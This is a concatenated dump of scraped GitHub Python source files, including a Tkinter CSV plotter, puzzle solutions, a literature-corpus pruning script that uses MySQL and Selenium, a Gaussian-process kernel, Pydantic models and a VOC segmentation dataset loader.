valueOfCheckList.append(IntVar())\n valueOfComboList.append(StringVar())\n c = 0\n for h in df.head(0):\n ch = Checkbutton(root, text=h, variable=valueOfCheckList[c], onvalue=1, offvalue=0, width=20)\n ch.grid(column=0, row=(6+c))\n buttonsAndChecksList.append(ch)\n cb = Combobox(root, text=\"Select Graph Format\", values=['Line', 'Scatter', 'Histogram', 'Bar'], textvariable=valueOfComboList[c])\n cb.current(0)\n cb.grid(column=1, row=(6+c))\n buttonsAndChecksList.append(cb)\n c += 1\n \ntitleLabel = Label(root, text=\"CSE 350 Data Visualization Project\").grid(column=0, row=0, columnspan=2)\nfilebutton = Button(root, text = \"Upload CSV File\", command = getCSVFile).grid(column=0, row=1, columnspan=2)\nheaderLabel = Label(root, text=\"Select Headers to Graph\").grid(column=0, row=5)\npickGraphForHeaderLabel = Label(root, text=\"Select Graph Format\").grid(column=1, row=5)\n\nroot.mainloop()","repo_name":"dchequer/Term-Project","sub_path":"src/startCodeProj.py","file_name":"startCodeProj.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18791698285","text":"#!/user/bin/python3\n\n\"\"\" This solves the problems of cows\"\"\"\n\nfor i in range(21):\n for j in range(34):\n for k in range(100):\n if i + j + k == 100:\n if 5*i + 3*j + k/5 == 100:\n print(i,j,k)\n","repo_name":"tonyle90/python-tutorial","sub_path":"number_of_cows.py","file_name":"number_of_cows.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"45824519841","text":"def split_point(r, c):\n global board\n for i in range(4):\n x = (r + dx[i]) % n\n y = (c + dy[i]) % n\n if board[x][y] == 0:\n board[x][y] = board[r][c] // 4\n\n\nn = int(input())\nk = int(input())\nboard = [list(map(int, input().split())) for _ in range(n)]\nans = 0\nturn = 0\n\nattack = list(map(int, input().split()))\nselect = -1\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\nwhile True:\n if turn == k:\n break\n max_bonus = 0\n for i in range(n):\n if board[i][turn] > max_bonus:\n max_bonus = board[i][turn]\n select = i\n if max_bonus >= 10:\n ans += max_bonus\n split_point(select, turn)\n else:\n if board[select][turn] > attack[turn]:\n board[select][turn] -= attack[turn]\n else:\n ans += board[select][turn]\n board[select][turn] = 0\n\nprint(ans)","repo_name":"twoju/Algorithm","sub_path":"Baekjoon/Gold/27958_shoot.py","file_name":"27958_shoot.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15128184671","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time: 2023/01/29\n# @Author: Neil Steven\n\nfrom urllib.parse import urlparse, urlunparse\n\nfrom ns_path import join_path\n\n__all__ = [\n \"join_url\"\n]\n\n\ndef join_url(base: str, path: str, *sub_path: str) -> str:\n arr = urlparse(base)\n path = join_path(arr.path, path, *sub_path)\n return urlunparse((arr.scheme, arr.netloc, path, arr.params, arr.query, arr.fragment))\n","repo_name":"Neil-Steven/nspy","sub_path":"ns_url.py","file_name":"ns_url.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38248871906","text":"import re\nimport os\nimport sys\nimport time\nimport logging\nimport logging.handlers\nfrom datetime import datetime\nimport mysql.connector\nfrom csv import reader\nimport filecmp\nfrom selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import Select\nfrom bs4 import BeautifulSoup\nfrom SPARQLWrapper import SPARQLWrapper, JSON\n\n# Get the directory to search from the user\nbase_dir: str = input(\"Enter the base directory of the literature files: \")\nprint_to_terminal: str = input(\"Output prints to terminal? (y/n)\")\n\n# Remove trailing '/' if it was given\nif base_dir[-1] == '/':\n\tbase_dir = base_dir[:-1]\n\nos.makedirs('logs/', exist_ok=True)\n\n# Custom logger\nlogger: logging.RootLogger = logging.getLogger(\"reduce_corpora\")\nlogger.setLevel(logging.DEBUG)\n\n# File name for log files\nlogfilename: str = 'logs/match_log{:%Y-%m-%d}.log'.format(datetime.now())\n\n# Flag to determine if the logger has already created a file\nrollover: bool = os.path.isfile(logfilename)\n\n# Handler for log files\n# The FileHandler will also output logs to the terminal window, so an extra\n# \thandler for that is not necessary\nfile_handler: logging.handlers.RotatingFileHandler = logging.handlers.RotatingFileHandler(logfilename, mode='w', backupCount=5, delay=True)\n\n# Handler for terminal log entries\nprint_handler: logging.StreamHandler = logging.StreamHandler()\n\nif 'y' in print_to_terminal.lower():\n\tprint_handler.setLevel(logging.DEBUG)\nelse:\n\tprint_handler.setLevel(logging.INFO)\n\n# Roll over file name if a log already exists\nif rollover:\n\tfile_handler.doRollover()\n\nfile_handler.setLevel(logging.DEBUG)\n\n# Formatter for logger output\nlog_format: logging.Formatter = logging.Formatter('%(asctime)s\\t: %(name)s : %(levelname)s -- %(message)s', '%Y-%m-%d %H:%M:%S')\nfile_handler.setFormatter(log_format)\nprint_handler.setFormatter(log_format)\n\n# Add to logger\nlogger.addHandler(file_handler)\nlogger.addHandler(print_handler)\n\n# Connect to SQL database\ndb_conn: mysql.connector.MySQLConnection = mysql.connector.connect(\n\tuser=os.environ.get('DB_USER'),\n\tpassword=os.environ.get('DB_PASS'),\n\thost=os.environ.get('DB_IP'),\n\tdatabase=os.environ.get('DB_DB'))\n\ndb_cursor: mysql.connector.cursor.CursorBase = db_conn.cursor()\n\n# This will go through the gut_texts and lib_texts directories and\n#\tremove all files/database entries that are seen as not published\n#\twithin the range we care about.\n# This uses a regular expression to find \"dates\" within the files, so it is\n#\tnot very accurate. This was not used in the final reduction of the\n#\tcorpora, but I figured the code should stay in case it is useful\n#\tin the future.\ndef remove_texts_out_of_range() -> None:\n\tre_date: object = re.compile(r'\\b1([0-9][0-9][0-9])\\b')\n\tin_range_count: int = 0\n\tmatch_count: int = 0\n\tdirs: list = ['gut_texts', 'lib_texts']\n\n\tfor pdir in dirs:\n\t\tlogger.info(f'Checking texts in {base_dir}/{pdir}...')\n\n\t\t# Walk the directory of files\n\t\tfor path, _, files in os.walk(os.path.abspath(f'{base_dir}/{pdir}')):\n\t\t\t# Process each file in the directory\n\t\t\tfor f in files:\n\t\t\t\tfilepath: str = os.path.join(path, f)\n\n\t\t\t\twith open(filepath, mode='r', encoding='utf8') as file:\n\t\t\t\t\t# Read the file line by line, checking for a string match.\n\t\t\t\t\t#\tIf a match is found, print the line it was found on\n\t\t\t\t\t#\tand the file path\n\t\t\t\t\tlargest_match: int = 0\n\t\t\t\t\tfor index, line in enumerate(file):\n\t\t\t\t\t\tmatch: object = re_date.search(line)\n\n\t\t\t\t\t\t# Found a match -> print the line & file then end loop\n\t\t\t\t\t\t# In a lot of the gutenberg files, the first match is some address in\n\t\t\t\t\t\t#\tSalt Lake City so it is best to skip over that one\n\t\t\t\t\t\tif match and 'salt lake city' not in line.lower():\n\t\t\t\t\t\t\tmatch_count = match_count + 1\n\t\t\t\t\t\t\tdate: int = int(match[0])\n\n\t\t\t\t\t\t\t# Keep the ones that are in range, but remove the file and database entry\n\t\t\t\t\t\t\t#\tfor the ones that are not\n\t\t\t\t\t\t\tif date > 1755:\n\t\t\t\t\t\t\t\tlogger.debug(f'OUT OF RANGE match {match[0]} found in {filepath} on line {index}:\\n\\t{line}')\n\t\t\t\t\t\t\t\t# Find the entry in the database containing this file and delete both\n\t\t\t\t\t\t\t\t#\tthe entry and the file\n\n\t\t\t\t\t\t\t\t## This code was left commented so nothing gets\n\t\t\t\t\t\t\t\t## accidentally deleted.\n\n\t\t\t\t\t\t\t\t# try:\n\t\t\t\t\t\t\t\t# \tdb_cursor.execute(f'SELECT id FROM work_metadata WHERE filepath LIKE \"{pdir}/{f}\"')\n\t\t\t\t\t\t\t\t# except Exception as err:\n\t\t\t\t\t\t\t\t# \tprint(f'{pdir}/{f}')\n\t\t\t\t\t\t\t\t# \tlogger.error(f'Problem finding file in database:', exc_info=True)\n\t\t\t\t\t\t\t\t# else:\n\t\t\t\t\t\t\t\t# \tresults: list = db_cursor.fetchall()\n\t\t\t\t\t\t\t\t# \t#print(results)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tlogger.debug(f'In-range match {match[0]} found in {filepath} on line {index}:\\n\\t{line}')\n\t\t\t\t\t\t\t\tin_range_count = in_range_count + 1\n\n\t\t\t\t\t\t\tbreak\n\n\t\tlogger.info(f'Found {in_range_count} files in {pdir} containing a match within the desired range.')\n\t\tlogger.info(f'{match_count} contained a match in general.')\n\n\t\tin_range_count = 0\n\t\tmatch_count = 0\n\n\tlogger.info(f'Matches can be found in {logfilename}')\n\ndef remove_unknown_titleauthor() -> None:\n\tdb_cursor.execute('SELECT id, filepath FROM work_metadata WHERE title LIKE \"UNKNOWN%\" AND author LIKE \"UNKNOWN%\";')\n\tresults: list = db_cursor.fetchall()\n\n\tlogger.info(f'Removing {len(results)} files and database entries with UNKNOWN title & author...')\n\t\n\tfor index, elem in enumerate(results):\n\t\ttry:\n\t\t\tos.remove(f'{base_dir}/{elem[1]}')\n\t\t\tdb_cursor.execute(f'DELETE FROM work_metadata WHERE id = {elem[0]}')\n\t\t\tdb_conn.commit()\n\t\texcept Exception as err:\n\t\t\tlogger.critical(f'Problem removing file or database entry for {elem[1]}: ', exc_info=True)\n\n\tlogger.info('Done.')\n\ndef remove_duplicates() -> None:\n\t# The entries that have duplicates have been stored in a csv file,\n\t#\tso we can just read the title and author combos and work with\n\t#\tthem directory instead of searching again\n\n\tequivalent: int = 0\n\n\twith open('query.csv', 'r') as csv_file:\n\t\tcsv_reader: reader = reader(csv_file, delimiter='\\t')\n\n\t\t# Skip over the header\n\t\theader: str = next(csv_reader)\n\n\t\t# Iterate over the file if it's not empty\n\t\tif header != None:\n\t\t\tfor row in csv_reader:\n\t\t\t\ttitle: str = row[0].replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\")\n\t\t\t\tauthor: str = row[1]\n\n\t\t\t\t# Find all entries with this title and author\n\t\t\t\tdb_cursor.execute(f'SELECT id, filepath FROM work_metadata WHERE title LIKE \"{title}\" AND author LIKE \"{author}\"')\n\t\t\t\tresults: list = db_cursor.fetchall()\n\t\t\t\tkeep: list = []\n\t\t\t\tremove: list = []\n\n\t\t\t\t# Compare the contents of each file to all of the other suspected duplicates\n\t\t\t\tfor res in results:\n\t\t\t\t\tfilepath1: str = f'{base_dir}/{res[1]}'\n\n\t\t\t\t\tfor res2 in results:\n\t\t\t\t\t\tfilepath2 = f'{base_dir}/{res2[1]}'\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Make sure we're not comparing the file to itself before we do the comparison\n\t\t\t\t\t\tif filepath1 != filepath2:\n\t\t\t\t\t\t\t# If the files are exactly equivalent, we can remove one of the duplicate\n\t\t\t\t\t\t\t#\tfiles and database entries\n\t\t\t\t\t\t\tif filecmp.cmp(filepath1, filepath2):\n\t\t\t\t\t\t\t\tlogger.debug(f'{filepath1} and {filepath2} are exactly equivalent.')\n\n\t\t\t\t\t\t\t\tif res not in keep:\n\t\t\t\t\t\t\t\t\tkeep.append(res)\n\n\t\t\t\t\t\t\t\tif res2 not in keep and res2 not in remove:\n\t\t\t\t\t\t\t\t\tremove.append(res2)\n\n\t\t\t\t# Remove all texts in the 'remove' list\n\t\t\t\tfor item in remove:\n\t\t\t\t\tdb_cursor.execute(f'DELETE FROM work_metadata WHERE id = {item[0]}')\n\t\t\t\t\tdb_conn.commit()\n\n\t\t\t\t\tos.remove(f'{base_dir}/{item[1]}')\n\n\t\t\t\t\tequivalent = equivalent + 1\n\n\tprint(f'{equivalent} duplicate files were removed.')\t\t\t\t\t\n\ndef remove_sj_books_and_dicts() -> None:\n\tdb_cursor.execute(\"SELECT id, filepath FROM work_metadata WHERE author LIKE '%Samuel Johnson%' OR author LIKE '%Johnson, Samuel%'\")\n\tbooks_by_sj: list = db_cursor.fetchall()\n\n\tdb_cursor.execute(\"SELECT id, filepath FROM work_metadata WHERE title LIKE '%dictionary%'\")\n\tdict_books: list = db_cursor.fetchall()\n\n\tfor book in books_by_sj:\n\t\tdb_cursor.execute(f\"DELETE FROM work_metadata WHERE id = {book[0]}\")\n\t\tdb_conn.commit()\n\t\tos.remove(f'{base_dir}/{book[1]}')\n\n\tfor book in dict_books:\n\t\tdb_cursor.execute(f\"DELETE FROM work_metadata WHERE id = {book[0]}\")\n\t\tdb_conn.commit()\n\t\tos.remove(f'{base_dir}/{book[1]}')\n\n\tprint(f'Removed {len(books_by_sj) + len(dict_books)} works.')\n\ndef verify_author_publication_dates(browser: webdriver.Chrome, author: str) -> list:\n\tloc_search_page: str = 'https://catalog.loc.gov/vwebv/searchAdvanced'\n\that_search_page: str = 'https://catalog.hathitrust.org/Search/Advanced'\n\tre_date: object = re.compile(r'\\b1([0-9][0-9][0-9])\\b')\n\n\t# Get all Gutenberg texts from the database\n\tdb_cursor.execute(f\"SELECT id, title, filepath FROM work_metadata WHERE author LIKE {author}\")\n\ttexts: list = db_cursor.fetchall()\n\n\tin_range_count: int = 0\n\ttexts_no_result: int = 0\n\ttexts_removed: int = 0\n\t\n\t# Search the HathiTrust catalog for each text. If no results were found, \n\t#\tdo another search on Library of Congress\n\tfor i, text in enumerate(texts):\n\t\ttext_id: int = text[0]\n\t\ttext_title: str = text[1]\n\t\ttext_filepath: str = text[2]\n\n\t\ttime.sleep(2)\n\n\t\t# Each search needs to begin on a fresh search page\n\t\tbrowser.get(hat_search_page)\n\n\t\t# Wait until the text boxes show up before trying to enter the title/author\n\t\tsearch_box: EC.presence_of_element_located = EC.presence_of_element_located((By.ID, 'field-search-text-input-1'))\n\t\tWebDriverWait(browser, 5).until(search_box)\n\n\t\t# Enter title and author into text boxes and select the corresponding\n\t\t#\toptions in the dropdowns to specify where to search in\n\t\tbrowser.find_element_by_id('field-search-text-input-1').send_keys(text_title)\n\t\tbrowser.find_element_by_id('field-search-text-input-2').send_keys(author)\n\n\t\tdropdown_title: Select = Select(browser.find_element_by_xpath('//*[@id=\"section\"]/form/fieldset[1]/div/select'))\n\t\tdropdown_title.select_by_value('title')\n\n\t\tdropdown_author: Select = Select(browser.find_element_by_xpath('//*[@id=\"section\"]/form/fieldset[2]/div/select'))\n\t\tdropdown_author.select_by_value('author')\n\n\t\t# Selecting the 'OR' radio button seems to yield better results\n\t\t#browser.find_element_by_xpath('//*[@id=\"section\"]/form/fieldset[2]/fieldset/div[2]/label').click()\n\n\t\tbrowser.find_element_by_class_name('button.btn.btn-primary').click()\n\n\t\t# Wait for the page to load before grabbing the HTML\n\t\tresults_intro: EC.presence_of_element_located = EC.presence_of_element_located((By.CLASS_NAME, 'listcs-intro'))\n\t\tWebDriverWait(browser, 5).until(results_intro)\n\n\t\tsoup: BeautifulSoup = BeautifulSoup(browser.page_source, 'lxml')\n\n\t\t# Check if no results were found\n\t\tresult_desc: bs4.element.Tag = soup.find('h2', class_='results-summary')\n\n\t\tif result_desc != None:\n\t\t\t# If no results on HathiTrust, need to search on LOC\n\t\t\tif 'No results matched your search' not in result_desc.text:\n\t\t\t\tlist_term: bs4.element.ResultSet = soup.find('dt')\n\t\t\t\tlist_desc: bs4.element.ResultSet = soup.find('dd')\n\t\t\t\tpub_date: int = 0\n\n\t\t\t\t# Sometimes a publication date isn't listed, so instead of trying\n\t\t\t\t#\tto access it directly we need to look for it. If there isn't one,\n\t\t\t\t#\tthen pub_date will remain 0 and we will count this text as within\n\t\t\t\t#\trange to be on the safe side.\n\t\t\t\tif 'Published' in list_term.text:\n\t\t\t\t\tpub_date = int(list_desc.text)\n\n\t\t\t\t# Remove all texts published outside our cutoff date\n\t\t\t\tif pub_date > 1755:\n\t\t\t\t\tdb_cursor.execute(f'DELETE FROM work_metadata WHERE id = {text_id}')\n\t\t\t\t\tdb_conn.commit()\n\t\t\t\t\tos.remove(f'{base_dir}/{text_filepath}')\n\n\t\t\t\t\ttexts_removed = texts_removed + 1\n\t\t\telse:\n\t\t\t\ttexts_no_result = texts_no_result + 1\n\n\t# print(f'Out of {len(gut_texts)} texts, {in_range_count} were in the date range.')\n\n\treturn [texts_no_result, texts_removed]\n\ndef verify_author_birthdates() -> None:\n\tre_date: object = re.compile(r'\\b1([0-9][0-9][0-9])\\b')\n\tget_author_query: str = \"\"\"SELECT author, count(author) FROM work_metadata\n\t\t\t\t\t\t\t WHERE filepath LIKE '%gut_texts%'\n\t\t\t\t\t\t\t OR filepath LIKE '%lib_texts%'\n\t\t\t\t\t\t\t GROUP BY author \n\t\t\t\t\t\t\t ORDER BY count(author) DESC\"\"\"\n\n\tdb_cursor.execute(get_author_query)\n\tauthor_list: list = db_cursor.fetchall()\n\n\tauthor_no_result: int = 0\n\n\t# Set up a headless Chrome instance to be used when no result is returned\n\t#\tfrom Wikidata\n\tchromeopts: Options = Options()\n\tchromeopts.headless = True\n\tchromeopts.add_argument('window-size=1920x1080')\n\tbrowser: webdriver.Chrome = Chrome(options=chromeopts)\n\n\tdef run_wiki_query(qauthor: str) -> int:\n\t\tprint(f'Running query on `{qauthor}`')\n\t\tendpoint_url: str = \"https://query.wikidata.org/sparql\"\n\t\tuser_agent: str = \"WDQS-example Python/%s.%s\" % (sys.version_info[0], sys.version_info[1])\n\n\t\tquery_string: str = \"\"\"\n\t\tSELECT distinct ?item ?itemLabel ?itemDescription (SAMPLE(?DR) as ?DR) (SAMPLE(?RIP) as ?RIP) (SAMPLE(?image)as ?image) (SAMPLE(?article)as ?article) WHERE {\n\t\t ?item wdt:P31 wd:Q5.\n\t\t ?item ?label \"%s\"@en. \n\t\t ?article schema:about ?item .\n\t\t ?article schema:inLanguage \"en\" .\n\t\t ?article schema:isPartOf . \n\t\t OPTIONAL{?item wdt:P569 ?DR .} # P569 : Date of birth\n\t\t OPTIONAL{?item wdt:P570 ?RIP .} # P570 : Date of death\n\t\t\t\n\t\t SERVICE wikibase:label { bd:serviceParam wikibase:language \"en\". } \n\t\t}\n\t\tGROUP BY ?item ?itemLabel ?itemDescription\n\t\t\"\"\"\n\n\t\tsparql: SPARQLWrapper = SPARQLWrapper(endpoint_url, agent=user_agent)\n\t\tsparql.setQuery(query_string % qauthor)\n\t\tsparql.setReturnFormat(JSON)\n\n\t\twiki_search_res: object = sparql.query().convert()\n\n\t\tearliest_date: int = 2100\n\n\t\tfor row in wiki_search_res['results']['bindings']:\n\t\t\ttry:\n\t\t\t\tdate: object = re_date.match(row['DR']['value'])\n\t\t\texcept Exception as e:\n\t\t\t\tdate: object = re_date.match('2100')\n\n\t\t\tif date:\n\t\t\t\tint_date: int = int(date[0])\n\n\t\t\t\tif int_date < earliest_date:\n\t\t\t\t\tearliest_date = int_date\n\n\t\treturn earliest_date\n\n\ttotal_removal_candidates: int = 0\n\tcross_ref_removals: int = 0\n\tcross_ref_no_results: int = 0\n\n\tfor result in author_list:\n\t\tauthor: str = result[0]\n\n\t\t# Some names with abbreviations in them are not spaced correctly,\n\t\t#\twhich causes them to not return a result from Wikidata.\n\t\t#\tThis regex will fix that; for example, 'H.G. Wells'\n\t\t#\twill become 'H. G. Wells'\n\t\tauthor = re.sub(r'\\.(?! )', '. ', author)\n\n\t\t# Similarly, some authors have quotes in them, like ones that\n\t\t#\thave a nickname along with their real name. Attempting\n\t\t#\tto pass that to SPARQL will throw an exception because of how\n\t\t#\tour query is formatted, so here we simply escape all \" instances\n\t\tauthor = author.replace('\"', r'\\\"')\n\n\t\torig_author: str = author\n\n\t\t# Skip over 'fake' authors, like 'Various' and such\n\t\tif not (author == 'Various' or author == 'Unknown' or author == 'Anonymous' or 'Editor' in author):\n\t\t\t# Check if there is a second name in parentheses, and if so\n\t\t\t#\tget the name not in parentheses\n\t\t\tif '(' in author:\n\t\t\t\ttokens: list = author.split('(')\n\t\t\t\tauthor = tokens[0]\n\t\t\t\tauthor2 = tokens[1][:-1]\n\n\t\t\tbirth_date: int = run_wiki_query(author.strip())\n\n\t\t\tif birth_date == 2100:\n\t\t\t\tauthor_no_result = author_no_result + 1\n\n\t\t\t\ttry:\n\t\t\t\t\tpub_date_result: list = verify_author_publication_dates(browser, author)\n\t\t\t\t\ttotal_removal_candidates = total_removal_candidates + pub_date_result[1]\n\t\t\t\t\tcross_ref_removals = cross_ref_removals + pub_date_result[1]\n\t\t\t\t\tcross_ref_no_results = cross_ref_no_results + pub_date_result[0]\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tpass\t\t\t\t\n\n\t\t\telif birth_date > 1755:\n\t\t\t\tprint(f'Author {author} born after 1755, removing {result[1]} texts.')\n\t\t\t\ttotal_removal_candidates = total_removal_candidates + result[1]\n\n\t\t\t\tdb_cursor.execute(f'SELECT id, filepath FROM work_metadata WHERE author LIKE \"{orig_author}\"')\n\t\t\t\ttexts: list = db_cursor.fetchall()\n\n\t\t\t\tfor entry in texts:\n\t\t\t\t\tdb_cursor.execute(f'DELETE FROM work_metadata WHERE id = {entry[0]}')\n\t\t\t\t\tdb_conn.commit()\n\t\t\t\t\tos.remove(f'{base_dir}/{entry[1]}')\n\n\tprint(f'{total_removal_candidates} texts were removed. Of the {author_no_result} authors that returned no result, {cross_ref_removals} of their texts were removed and {cross_ref_no_results} of their texts could not be found.')\n\n\tbrowser.close()\n\n\t# result = return_sparql_query_results(query_string % author)\n\t# for row in result['results']['bindings']:\n\t# \tprint(row['DR']['value'])\n\nverify_author_birthdates()\n\ndb_conn.close()\n","repo_name":"CHDRucf/SJD-Quotes-Processor","sub_path":"scraper/reduce_corpora.py","file_name":"reduce_corpora.py","file_ext":"py","file_size_in_byte":16422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15672035463","text":"import torch\nfrom copy import deepcopy\nfrom itertools import chain, combinations\n\nfrom gaussed.kernel.base import CompositeKernel\n\n\nclass PartialAnovaKernel(CompositeKernel):\n\n def __init__(self, kernel_list, interacting_dims):\n super().__init__(*kernel_list)\n self.dim = max([j for i in interacting_dims for j in i]) + 1\n\n self.interacting_dims = interacting_dims # a list of lists\n\n for i in range(len(self.kernels)):\n self.kernels[i].dim = len(interacting_dims[i])\n self.kernels[i].bases[0].dim = len(interacting_dims[i])\n self.kernels[i].bases[0].set_dims(interacting_dims[i])\n\n if self.kernels[i].bases[0].dim == self.dim:\n self.kernels[i].bases[0].set_full_dims(True)\n else:\n self.kernels[i].bases[0].set_full_dims(False)\n\n def eval(self, x1, x2):\n raise NotImplementedError\n\n def basis_eval(self, x, m_list):\n\n basis_mat_list = []\n\n for i in range(len(self.kernels)):\n basis_mat_list.append(self.kernels[i].basis_eval(x, m_list[i]))\n\n return torch.cat(basis_mat_list, dim=1)\n\nclass AnovaKernel(PartialAnovaKernel):\n\n def __init__(self, kernel, dim):\n interacting_dims = self.get_full_interacting_dim_list(dim)\n kernel_list = [deepcopy(kernel) for i in range(len(interacting_dims))]\n for i in range(len(kernel_list)):\n kernel_list[i].set_dim(len(interacting_dims[i]))\n super().__init__(kernel_list, interacting_dims)\n\n @staticmethod\n def get_full_interacting_dim_list(dim):\n s = [i for i in range(dim)]\n iter_object = chain.from_iterable(combinations(s, r) for r in range(1, len(s)+1))\n return [list(i) for i in list(iter_object)]","repo_name":"MatthewAlexanderFisher/GaussED","sub_path":"src/gaussed/kernel/anova.py","file_name":"anova.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"71291521757","text":"from enum import auto\nfrom typing import Literal\n\nfrom heliclockter import datetime_utc\n\nfrom bracket.models.db.shared import BaseModelORM\nfrom bracket.utils.types import EnumAutoStr\n\n\nclass StageType(EnumAutoStr):\n DOUBLE_ELIMINATION = auto()\n ROUND_ROBIN = auto()\n SINGLE_ELIMINATION = auto()\n SWISS = auto()\n SWISS_DYNAMIC_TEAMS = auto()\n\n\nclass Stage(BaseModelORM):\n id: int | None = None\n tournament_id: int\n created: datetime_utc\n type: StageType\n is_active: bool\n\n\nclass StageUpdateBody(BaseModelORM):\n is_active: bool\n\n\nclass StageActivateBody(BaseModelORM):\n direction: Literal['next', 'previous'] = 'next'\n\n\nclass StageCreateBody(BaseModelORM):\n type: StageType\n","repo_name":"evroon/bracket","sub_path":"backend/bracket/models/db/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"51"} +{"seq_id":"20400705760","text":"# parameters for the Elo algorithm -- setting kind of arbitrarily for now, should tune once we have more data\nDEFAULT_K_VALUE = 80\nDEFAULT_D_VALUE = 600\nDEFAULT_SCORING_FUNCTION_BASE = 1.0\nINITIAL_RATING = 1000\n\n# Google Sheets info for reading input data\nGSHEETS_CREDENTIALS_FILE = \"./google-credentials.json\"\nSPREADSHEET_ID = \"17em2c8aP1zPWXQSSEDTYau8yRhKCvKfvzWnyv1LEsys\"\nDATA_SHEET_ID = 302447166\nDUMMY_PLAYER_NAME = \"_dummy_\"\n\n# dashboard settings\nDBC_THEME = \"FLATLY\" # others I liked: DARKLY, SIMPLEX, LUMEN (https://bootswatch.com/flatly/)\nPLOTLY_THEME = \"plotly_white\"\nLOGO_PATH = \"/assets/tbycsprints.png\"\nGITHUB_LOGO_PATH = \"assets/GitHub-Mark-32px.png\"\nGITHUB_URL = \"https://github.com/alexpersin/tbyc-elo\"\nTITLE = \"TBYC Sprint 15 Rankings\"\nSUBTITLE = \"Home of Uncommonly Smooth Sailing\"\n","repo_name":"alexpersin/tbyc-elo","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"74549242718","text":"import os\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision.transforms import functional as Ft\nimport matplotlib.pyplot as plt\n\nfrom preprocessing import custom_transforms as tr\n\n\n# 接下来,对标签图片进行处理,将其转换为对应的标签矩阵。先列出标签中每个RGB的值及其对应类别,一共21类:\nclasses = ['background',\n 'aeroplane',\n 'bicycle',\n 'bird',\n 'boat',\n 'bottle',\n 'bus',\n 'car',\n 'cat',\n 'chair',\n 'cow',\n 'diningtable',\n 'dog',\n 'horse',\n 'motorbike',\n 'person',\n 'potted plant',\n 'sheep',\n 'sofa',\n 'train',\n 'tv/monitor']\n\n# RGB color for each class\ncolormap = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0], [0, 0, 128],\n [128, 0, 128], [0, 128, 128], [128, 128, 128], [64, 0, 0], [192, 0, 0],\n [64, 128, 0], [192, 128, 0], [64, 0, 128], [192, 0, 128],\n [64, 128, 128], [192, 128, 128], [0, 64, 0], [128, 64, 0],\n [0, 192, 0], [128, 192, 0], [0, 64, 128]]\ncolormap = np.asarray(colormap)\ncm2lbl = np.zeros(256 ** 3)\n\n# 建立一个索引,将标签图片中每个像素的RGB值一对一映射到对应的类别索引:\nfor i, cm in enumerate(colormap):\n cm2lbl[(cm[0] * 256 + cm[1]) * 256 + cm[2]] = i\n\n\ndef image2label(im):\n data = np.array(im, dtype='int32')\n idx = (data[:, :, 0] * 256 + data[:, :, 1]) * 256 + data[:, :, 2]\n return np.array(cm2lbl[idx], dtype='int64')\n\n\n\n\n\n\n\n\n\nclass VOCSegmentation(Dataset):\n \"\"\"\n\n 最后,通过torch.utls.data.Dataset自定义数据集类,\n 通过._getitem__函数,访问数据集中索引为idx 的输入图像及其对应的标签矩阵。\n 由于数据集中有些图像的尺寸可能小于随机裁剪所指定的输出尺寸,这些样本需要通过自定义的fiter 函数所移除。\n 此外,还对输入图像的RGB三个通道的值分别做标准化。\n\n \"\"\"\n\n def __init__(self, config, split='train' ):\n \"\"\"\n :param voc_root: 放置数据集的位置\n :param year: 年份,我这里只放置了2012年的\n :param transforms: 是否对图片进行裁剪,transforms =None不进行裁剪\n :param txt_name:\n \"\"\"\n\n super(VOCSegmentation, self).__init__()\n self.config = config\n self.split = split\n self.num_classes = self.num_classes = self.config['network']['num_classes']\n root = os.path.join(config['dataset']['base_path'], \"VOCdevkit\", f\"VOC2010\")\n # 拼接字符串\n assert os.path.exists(root), \"path '{}' does not exist.\".format(root)\n image_dir = os.path.join(root, 'JPEGImages')\n # 掩膜的路径位置,就是分割好的图片\n mask_dir = os.path.join(root, 'SegmentationClass')\n #\n txt_path = ''\n if split=='train':\n txt_path = os.path.join(root, \"ImageSets\", \"Segmentation\", \"train.txt\")\n if split=='val':\n txt_path = os.path.join(root, \"ImageSets\", \"Segmentation\", \"val.txt\")\n\n assert os.path.exists(txt_path), \"file '{}' does not exist.\".format(txt_path)\n\n with open(os.path.join(txt_path), \"r\") as f:\n file_names = [x.strip() for x in f.readlines() if len(x.strip()) > 0]\n\n # 根据Segmentation 文件夹下所以提供的train.txt,来进行图片的加载\n self.images = [os.path.join(image_dir, x + \".jpg\") for x in file_names]\n # 掩膜图片位置\n self.masks = [os.path.join(mask_dir, x + \".png\") for x in file_names]\n assert (len(self.images) == len(self.masks))\n\n\n\n\n def __getitem__(self, index):\n _img, _target, _h, _w = self._make_img_gt_point_pair(index)\n # print(_img.size)\n\n # seg_labels = np.eye(self.num_classes)[_target.reshape([-1])]\n #\n # seg_labels = seg_labels.reshape((int(_img[0]), int(_img[1]), 